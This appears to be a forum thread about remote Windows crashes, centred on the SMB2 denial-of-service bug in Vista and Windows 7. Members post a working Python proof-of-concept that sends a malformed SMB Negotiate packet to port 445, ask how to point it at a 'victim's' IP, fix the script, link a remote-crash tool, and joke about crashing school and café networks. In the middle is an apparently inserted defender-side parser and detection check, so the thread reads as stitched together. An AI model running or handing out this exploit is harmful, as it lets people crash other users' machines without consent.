RightCoast

Time to party like it's 1999!

14 posts in this topic

Remember the glorious days of the '90s, when any 14-year-old with cut and paste and the wherewithal to read for an hour could attack a Windows machine and give it a remote BSOD? No? You are too young, you say? Fear not, your time in the sun has come. ;)

The good old days are back baby! Microsoft seems to have made the teardrop attack possible again in Windows 7 ... uh, as an eminently wise Andover Prep/Yale cowboy once said ... "heckuva job Brownie!"


"Windows XP, 2k are NOT affected as they don't have this driver."

I think that is why the phrase, "if it ain't broke don't fix it", was coined...


One time back in the late '90s, some German hackers were fucking with me on Napster.

I used to have a lot of industrial and electronic music in my collection, and after downloading a bunch of my files, they PM'd me and asked if I had any mp3s of Cabaret Voltaire and KMFDM. I replied that I had some on my home computer, but was out in public at the moment with my laptop and did not have those files on hand. They replied with, "In that case then we will delete you."

I just finished typing, "OK whatever," when my machine suddenly froze up for several seconds and I got a BSOD. I rebooted the computer, restarted Napster and within seconds I got another BSOD. After this happened 3 or 4 more times, I rebooted, restarted Napster, and created a new user profile before connecting to the Internet. I was back on Napster for about half an hour before it happened again.

After rebooting, I discontinued using Napster and began searching the Web for information on how it might be possible for somebody to crash Windows over the Internet like this. Unfortunately, I never found any good information until years later when I talked to a friend about it. He told me it was a flaw in the TCP implementation of Windows 9x systems.

Kind of amusing that there's now at least a brief window where this sort of thing will be possible again.

Edited by Colonel Panic

Hmm. Too bad the ports won't be on the internet to f with unless, like 1999, everyone is plugged directly into the modem/internet. It's just because SMB2 is brand new and not the ancient IBM one, and pretty much every Linux kernel has been rooted and the only way to be secure is to update every single time you can, and no one's talking shiz about Linux being insecure. Interesting find nonetheless, kind of like Conficker o0o0o0o0 it's scary but not really a problem lols.


> One time back in the late '90s, some German hackers were fucking with me on Napster.
>
> I used to have a lot of industrial and electronic music in my collection, and after downloading a bunch of my files, they PM'd me and asked if I had any mp3s of Cabaret Voltaire and KMFDM. I replied that I had some on my home computer, but was out in public at the moment with my laptop and did not have those files on hand. They replied with, "In that case then we will delete you."
>
> I just finished typing, "OK whatever," when my machine suddenly froze up for several seconds and I got a BSOD. I rebooted the computer, restarted Napster and within seconds I got another BSOD. After this happened 3 or 4 more times, I rebooted, restarted Napster, and created a new user profile before connecting to the Internet. I was back on Napster for about half an hour before it happened again.
>
> After rebooting, I discontinued using Napster and began searching the Web for information on how it might be possible for somebody to crash Windows over the Internet like this. Unfortunately, I never found any good information until years later when I talked to a friend about it. He told me it was a flaw in the TCP implementation of Windows 9x systems.
>
> Kind of amusing that there's now at least a brief window where this sort of thing will be possible again.

That actually brought back a lot of memories for me haha, thanks for that :)

A bit off topic but I bet you it was Super-KOD http://www.packetstormsecurity.org/DoS/SuperKoD-1.1.tgz It was actually a flaw in IGMP not TCP. I think it became public around 2001, but I know for sure that this was floating around IRC much earlier than this. It was interesting because at this point in time people had thought that the remote BSOD was long gone already.

*edited* to remove information on activities that I don't condone :sad:

Edited by mecca_

One of the guys at our hacker space tried out this attack on another member's laptop which runs Vista. He used the Python script posted here: http://seclists.org/fulldisclosure/2009/Sep/0039.html

It worked! Her machine froze and within seconds the screen displayed a Black Screen of Death (the new, updated Vista version of the good ole Windows BSOD).

This attack only works from within a trusted LAN ("private" network) against machines running Windows Vista or Windows 7 which have SMB enabled.

Edited by Colonel Panic

> One of the guys at our hacker space tried out this attack on another member's laptop which runs Vista. He used the Python script posted here: http://seclists.org/fulldisclosure/2009/Sep/0039.html
>
> It worked! Her machine froze and within seconds the screen displayed a Black Screen of Death (the new, updated Vista version of the good ole Windows BSOD).
>
> This attack only works from within a trusted LAN ("private" network) against machines running Windows Vista or Windows 7 which have SMB enabled.

I haven't actually looked into it, so thanks for the update. Some Googling shows that Server 2008 is also affected, though you all might not have had that to test against.

In any case, while this may not be quite as hilariously annoying as hooking people up with a new cupholder after you saw them on p2p when it was new, this can cause fair amounts of havoc in cafes and internal networks. Plus, I'd imagine the day is not far off where this is crafted into code where it is delivered as payload for other systems on a LAN. I'm thinking of some Humanities student opening up their free iPod email only to watch their friends all BSOD, heh.

Hi school admins. Have fun this year. You poor, poor bastards. ;)


> In any case, while this may not be quite as hilariously annoying as hooking people up with a new cupholder after you saw them on p2p when it was new, this can cause fair amounts of havoc in cafes and internal networks. Plus, I'd imagine the day is not far off where this is crafted into code where it is delivered as payload for other systems on a LAN. I'm thinking of some Humanities student opening up their free iPod email only to watch their friends all BSOD, heh.
>
> Hi school admins. Have fun this year. You poor, poor bastards. ;)

I'm sure Microsoft is already working diligently to develop an emergency security patch and will be pushing it out within a few days, so this exploit will just die an inglorious death before too many script-kiddies get hold of it.

:dry:


I would really like to test this out with one of my Windows 7 Beta boxes.

Would I just replace "IP_ADDR" with the victim's IP address and then run the script?

Any help would be appreciated, Thanks!

```python
#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep

host = "IP_ADDR", 445

buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)

s = socket()
s.connect(host)
s.send(buff)
s.close()
```

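From the defender's side, the thing worth pulling out of the script above is that the only unusual byte in the packet is the Process ID High field of an otherwise ordinary SMB1 Negotiate request; everything else (the NetBIOS session framing, the dialect list ending in "SMB 2.002") is what any client sends. The following is an added example, not code from the thread or from the script's author: a Python 3 parser for a NetBIOS-session-framed SMB1 message that decodes the header and, for a Negotiate, the dialect list, plus a check that flags a non-zero PIDHigh in a Negotiate. The malformed sample is the byte string from the post above; the benign twin, the function names and the finding text are constructed for this example.

```python
import struct

SMB_COM_NEGOTIATE = 0x72

# Constructed sample: the Negotiate request from the script posted above, copied byte for
# byte so the checks below can run offline against the exact message the thread discusses.
MALFORMED_NEGOTIATE = (
    b"\x00\x00\x00\x90"  # NetBIOS session message, payload length 0x90 = 144 bytes
    b"\xff\x53\x4d\x42"  # SMB1 magic: 0xFF 'S' 'M' 'B'
    b"\x72\x00\x00\x00"  # Command 0x72 (SMB_COM_NEGOTIATE), first 3 bytes of Status
    b"\x00\x18\x53\xc8"  # last Status byte, Flags 0x18, Flags2 0xc853 (little-endian)
    b"\x00\x26"          # Process ID High = 0x2600; a client normally sends 0x0000 here
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # SecurityFeatures, Reserved, TID, PIDLow
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount, ByteCount, dialects...
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)

# Constructed benign twin: the same Negotiate with Process ID High zeroed, as a normal
# client sends it. Offsets 16-17 of the full buffer hold PIDHigh (4 NBSS + 12 into SMB).
BENIGN_NEGOTIATE = MALFORMED_NEGOTIATE[:16] + b"\x00\x00" + MALFORMED_NEGOTIATE[18:]


def parse_smb1(data):
    """Parse a NetBIOS-session-framed SMB1 message into its header fields.

    Only the 32-byte SMB1 header is decoded, plus the dialect list when the command is
    Negotiate. Anything that does not fit that framing raises ValueError so a caller can
    count it separately instead of treating it as a clean message.
    """
    if len(data) < 4 + 32:
        raise ValueError("too short for an NBSS header plus SMB1 header")
    if data[0] != 0x00:
        raise ValueError("not a NetBIOS session message (type 0x00)")
    nbss_len = int.from_bytes(data[1:4], "big")
    smb = data[4:]
    if nbss_len != len(smb):
        raise ValueError("NBSS length %d does not match %d payload bytes" % (nbss_len, len(smb)))
    if smb[:4] != b"\xffSMB":
        raise ValueError("missing SMB1 magic")
    # Header layout after the magic (little-endian): Command(1) Status(4) Flags(1)
    # Flags2(2) PIDHigh(2) SecurityFeatures(8) Reserved(2) TID(2) PIDLow(2) UID(2) MID(2)
    command, status, flags, flags2, pid_high = struct.unpack_from("<BIBHH", smb, 4)
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", smb, 24)
    hdr = {
        "command": command, "status": status, "flags": flags, "flags2": flags2,
        "pid_high": pid_high, "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid,
        "dialects": [],
    }
    if command == SMB_COM_NEGOTIATE:
        word_count = smb[32]                   # a Negotiate request carries WordCount 0
        body = smb[33 + 2 * word_count:]
        if len(body) < 2:
            raise ValueError("Negotiate body truncated before ByteCount")
        byte_count = struct.unpack_from("<H", body, 0)[0]
        blob = body[2:2 + byte_count]
        # Each dialect entry is 0x02 followed by a NUL-terminated ASCII string.
        for entry in blob.split(b"\x00"):
            if entry.startswith(b"\x02"):
                hdr["dialects"].append(entry[1:].decode("ascii", "replace"))
    return hdr


def inspect_negotiate(data):
    """Return a list of finding strings for one message; an empty list means nothing odd."""
    hdr = parse_smb1(data)
    findings = []
    if hdr["command"] == SMB_COM_NEGOTIATE and hdr["pid_high"] != 0:
        findings.append("negotiate with non-zero PIDHigh 0x%04x" % hdr["pid_high"])
    return findings


if __name__ == "__main__":
    for name, msg in (("malformed", MALFORMED_NEGOTIATE), ("benign", BENIGN_NEGOTIATE)):
        hdr = parse_smb1(msg)
        print(name, "dialects:", hdr["dialects"])
        print(name, "findings:", inspect_negotiate(msg) or "none")
```

Running it shows both messages offering the same seven dialects, ending with "SMB 2.002", and only the malformed one producing a finding. The check is deliberately scoped to the Negotiate command: PIDHigh is legitimately the upper half of a 32-bit process id in other SMB1 commands, so alerting on any non-zero value would be noisy, while in a Negotiate the thread's own comment ("normal value should be \x00\x00") is the baseline. The dialect list also explains the thread's observation that XP and 2000 are not affected: a request that advertises "SMB 2.002" is handed to the SMB2 server driver on hosts that have one, and hosts without it never reach the faulting code.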

> I would really like to test this out with one of my Windows 7 Beta boxes.
>
> Would I just replace "IP_ADDR" with the victim's IP address and then run the script?
>
> Any help would be appreciated, Thanks!
>
> ```python
> #!/usr/bin/python
> # When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
> # PAGE_FAULT_IN_NONPAGED_AREA
> from socket import socket
> from time import sleep
>
> IP_ADDR = "127.0.0.1"
> host = "IP_ADDR", 445
>
> buff = (
> "\x00\x00\x00\x90" # Begin SMB header: Session message
> "\xff\x53\x4d\x42" # Server Component: SMB
> "\x72\x00\x00\x00" # Negotiate Protocol
> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
> "\x00\x26" # Process ID High: --> :) normal value should be "\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
> "\x30\x30\x32\x00"
> )
>
> s = socket()
> s.connect(host)
> s.send(buff)
> s.close()
> ```

Wow, I am a dumbass.

I got that shit rolling.

Pretty neat.

Edited by schippystrich


> host = "IP_ADDR", 445

But you forgot to take off the quotes.

host = IP_ADDR, 445


I am going to make an exploit video and post in on my website tomorrow. I'll link when it's done!


> But you forgot to take off the quotes.
>
> host = IP_ADDR, 445

Oops, I forgot to change that, good catch.

